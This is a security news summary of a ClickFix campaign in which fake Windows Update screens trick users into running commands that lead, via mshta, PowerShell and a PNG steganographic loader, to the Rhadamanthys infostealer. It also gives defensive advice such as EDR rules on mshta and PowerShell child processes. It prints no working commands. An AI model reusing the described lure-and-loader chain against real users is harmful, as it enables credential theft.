Fresh ClickFix attacks use Windows Update trick-pics to steal credentials
Summary
A new wave of ClickFix social‑engineering attacks is using convincing full‑screen fake Windows Update pages to trick victims into running commands from the Run box. Attackers hide a steganographic loader inside PNG images — encoding malicious Donut‑packed shellcode in pixel data and reconstructing it via colour channels — to deploy the Rhadamanthys infostealer, which exfiltrates login credentials.
The multi‑stage chain observed by Huntress typically begins with an mshta.exe call to a URL (with a hex‑encoded second octet), runs PowerShell that decrypts and reflectively loads a .NET assembly, and then launches the PNG‑based loader that executes the infostealer in memory. Huntress investigated 76 incidents between 29 September and 30 October 2025 across the US, EMEA and APJ. Some lure domains remain active even after recent law‑enforcement takedowns of Rhadamanthys infrastructure.
Key Points
- ClickFix lures now impersonate Windows Update full‑screen screens to pressure users into pasting and running commands in the Run box.
- Attackers use steganography: malicious code is embedded in PNG pixel data and rebuilt in memory using specific colour channels to evade signature detection.
- The execution chain: mshta.exe -> PowerShell -> decrypted .NET assembly -> steganographic loader -> Donut‑packed shellcode -> Rhadamanthys infostealer.
- Huntress recorded 76 incidents in a month, affecting organisations across multiple regions; some lure domains remain active after takedowns.
- Defensive measures include blocking the Windows Run box, user training (real updates/CAPTCHAs won’t ask you to paste commands), and EDR rules monitoring mshta.exe, powershell.exe or other unexpected child processes of explorer.exe.
Context and Relevance
This is part of a broader surge in ClickFix/FileFix style campaigns that rely on social engineering rather than exploiting vulnerabilities. The shift to steganographic loaders shows attackers are investing in detection‑evasion techniques to keep infostealers like Rhadamanthys effective even after infrastructure disruptions. For security teams the story underlines two trends: human‑targeted tricks remain the top initial access vector, and attackers are increasingly using creative binary/data hiding to bypass signature‑based defences.
Why should I read this?
Because it’s a nasty — and dumbly convincing — trick that anyone on Windows can fall for. If you manage endpoints or train staff, this tells you exactly how they’re baiting people (fake update screen + paste this command = trouble) and what to lock down fast. Quick wins: stop users pasting commands, tighten EDR alerts for odd mshta/powershell behaviour, and point people at the real Windows Update. We’ve skimmed the tech so you don’t have to.